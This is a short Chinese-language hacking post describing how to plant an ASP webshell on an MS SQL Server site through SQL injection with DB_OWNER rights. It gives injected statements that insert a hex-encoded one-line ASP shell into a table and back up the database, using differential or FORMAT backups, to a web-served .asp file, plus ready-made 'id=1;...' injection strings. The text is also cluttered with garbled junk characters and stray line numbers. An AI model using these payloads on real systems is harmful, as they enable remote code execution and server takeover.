DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

) T- j, K2 k( Q: `减少备份文件大小，得到可执行的webshell成功率提高不少
; Z/ \* C! j7 A; [一利用差异备份
加一个参数WITH DIFFERENTIAL

: t: {7 J! k, n$ h/ I8 d5 ^+ R1
2
+ k7 ]  q9 F9 x0 U, G: i3 {* T3
( K: O( X7 |: J5 B4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
; H" l5 u3 r" X1 p& {5 Udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

$ Z- K) T+ ^# W9 y% O0 G9 v6 w二利用完全FORMAT
/ d7 a7 U  r2 J加一个参数WITH FROMAT
: i5 o1 [& p: w2 Q/ T3 c* L有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

1
2
3
# \7 s% A* X4 O* T7 i4
4 Q3 J3 S& A1 a( ~2 t, G declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
# {* S6 U8 e8 a" vinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
. O* M, H7 I3 d( R+ V0 I5 J5 }3 E" adeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
9 T! A6 v% S! t6 Y/ b- }) v$ m
7 n! T% B" D5 O0 H总的来说就是那么简单几句,下面以备份数据库model为例子
' Y; y/ X6 x1 p( `' _1

7 B  y. t6 {* \% Z% g3 h1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
; I( g0 [8 `9 ~/ m! r7 V$ }
2

1
% E) F% J( U% u5 i' v) S id=1;backup database model to disk='你的路径‘ with differential,format;--
" j2 o! O  k5 c) \% q/ M) X